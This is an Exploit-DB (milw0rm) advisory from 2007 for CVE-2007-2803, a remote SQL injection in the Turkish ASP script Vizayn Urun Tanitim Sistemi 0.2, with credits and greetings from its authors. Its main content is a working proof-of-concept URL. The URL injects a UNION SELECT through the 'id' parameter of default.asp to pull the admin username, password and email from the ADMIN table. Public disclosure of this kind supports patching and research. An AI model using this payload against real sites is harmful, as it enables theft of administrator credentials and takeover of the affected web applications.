Vizayn Urun Tanitim Sistemi 0.2 tr Remote SQL Injection Vulnerability

2007-05-30T00:00:00
ID EDB-ID:4007
Type exploitdb
Reporter BAHADIR
Modified 2007-05-30T00:00:00

Description

Vizayn Urun Tanitim Sistemi 0.2 (tr) Remote SQL Injection Vulnerability. CVE-2007-2803. Webapps exploit for asp platform

                                        
                                            /* Vizayn Urun Tanitim Sistemi v0.2 (tr) Remote SQL Injection Vulnerability
Found by : ertuqrul
PoC By : BAHADIR
Contact: bahadir@bsdmail.org
Scripr HomePage: http://www.vizayn.web.tr/ws.asp?ws=102
Script Demo URL: http://ws.vizaynhosting.com/V02/
Price : 55YTL 

PoF Concept:
Http://[HOST]/[PATH]/default.asp?islem=haberdetay&id=-1%20union%20select%20USERNAME,PASSWORD,EMAIL,USERNAME%20from%20ADMIN
Takes admin username ,password and email adress from admin table 

W0rdz:Maksat Birseyler Eklemek Olsun =)
GreetZ Goes To : BURCU (Her Ne Kadar Bilmesede :D ) Ayrica Dostum Erchin'e ( Ercin Kardesim, Warcraftin Amk. Birak Su Malak Oyunu :D )  
and also to Str0ke For Posting :)
*/

# milw0rm.com [2007-05-30]